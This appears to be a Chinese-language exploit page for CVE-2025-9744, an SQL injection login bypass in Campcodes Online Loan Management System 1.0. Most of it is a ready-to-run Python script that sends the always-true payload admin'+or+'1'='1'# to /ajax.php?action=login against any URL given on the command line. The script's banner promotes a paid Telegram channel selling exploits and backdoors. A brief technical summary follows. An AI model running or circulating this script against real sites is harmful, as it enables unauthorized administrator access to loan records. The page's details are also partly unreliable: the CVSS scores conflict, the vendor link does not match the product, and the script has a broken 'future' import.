本文详细分析了Campcodes在线贷款管理系统1.0版本的SQL注入漏洞CVE-2025-9744,包含完整的Python利用代码实现,通过构造恶意SQL语句绕过身份验证,CVSS评分高达9.8分。
Campcodes在线贷款管理系统1.0 SQL注入漏洞利用 CVE-2025-9744
漏洞信息
- 发现日期:2025-10-21
- CVSS评分:9.8
- CVE编号:CVE-2025-9744
- 影响版本:<= 1.0.0
- 测试平台:Windows
漏洞详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
|
# -*- coding: utf-8 -*-
# Exploit [Loan Management System] v1.0 - SQL Injection
# Google Dork: N/A
# Date: 20/10/2025
# Exploit Author: CodeB0ss
# Vendor: Loan Management System
# Software Link: https://www.loanpro.io/
# Version: <= 1.0.0
# Tested on: Windows
# CVE : CVE-2025-9744
# CVSS Score : 10
from future import print_function
import requests
import sys
banner = '''
-#-
bY t.me/uncodeboss
CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection
[Notification] : Become a VP user and get all the exploits and tools,
backdoors
t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw
[Usage] :
python CVE-2025-9744.py -u http/https or just example.com.
'''
try:
requests.packages.urllib3.disable_warnings()
except:
pass
def codeb0ssexp(codeb0ss_base):
if not codeb0ss_base.startswith("http://") and not codeb0ss_base.startswith("https://"):
codeb0ss_base = "http://" + codeb0ss_base
base_url = codeb0ss_base.rstrip("/")
cdb0s = requests.Session()
cdb0s.headers.update({
'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101 Firefox/113.0',
'Content-Type': 'application/x-www-form-urlencoded'
})
red = "\033[91m"
green = "\033[92m"
post_path = "/ajax.php?action=login"
get_path = "/index.php?page=home"
post_url = base_url + post_path
get_url = base_url + get_path
username = "admin'+or+'1'%3D'1'%23"
password = "expbycodeb0ss"
payload = "username={}&password={}".format(username, password)
try:
r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
r_get = cdb0s.get(get_url, timeout=10, verify=False)
try:
combined = (r_post.text or "") + (r_get.text or "")
except Exception:
combined = (r_post.content or "") + (r_get.content or "")
group1 = ["window.start_load", "Welcome back Admin", "Loan Management System"]
group1_ok = all(w in combined for w in group1)
group2_ok = ("login-form" in combined)
if group1_ok and group2_ok:
print(" - " + base_url + " --> " + green + "Vulnerable")
print(" - {}".format(post_url))
print(" - {}".format(get_url))
return 0
else:
print(" - " + base_url + " --> " + red + "Not_Vulnerable")
return 2
except requests.exceptions.RequestException as e:
print(" - " + base_url + " --> " + red + "Time0ut")
return 1
def startexp():
if '-u' in sys.argv:
idx = sys.argv.index('-u')
if idx + 1 < len(sys.argv):
return sys.argv[idx + 1]
return None
def main():
print(banner)
target = startexp()
if not target:
sys.exit(1)
rc = codeb0ssexp(target)
sys.exit(rc)
if __name__ == "__main__":
main()
|
技术要点
该漏洞利用脚本通过构造特定的SQL注入载荷来绕过Campcodes在线贷款管理系统的身份验证机制。主要技术特点包括:
- 注入点:
/ajax.php?action=login 接口的username参数
- 注入载荷:
admin'+or+'1'%3D'1'%23 实现永真条件绕过
- 请求方法:使用POST请求发送恶意载荷
- 验证机制:通过检查响应内容中的特定关键词来判断注入是否成功
- 会话管理:使用requests.Session维持会话状态
该漏洞允许攻击者无需有效凭证即可获得管理员访问权限,属于高危安全漏洞。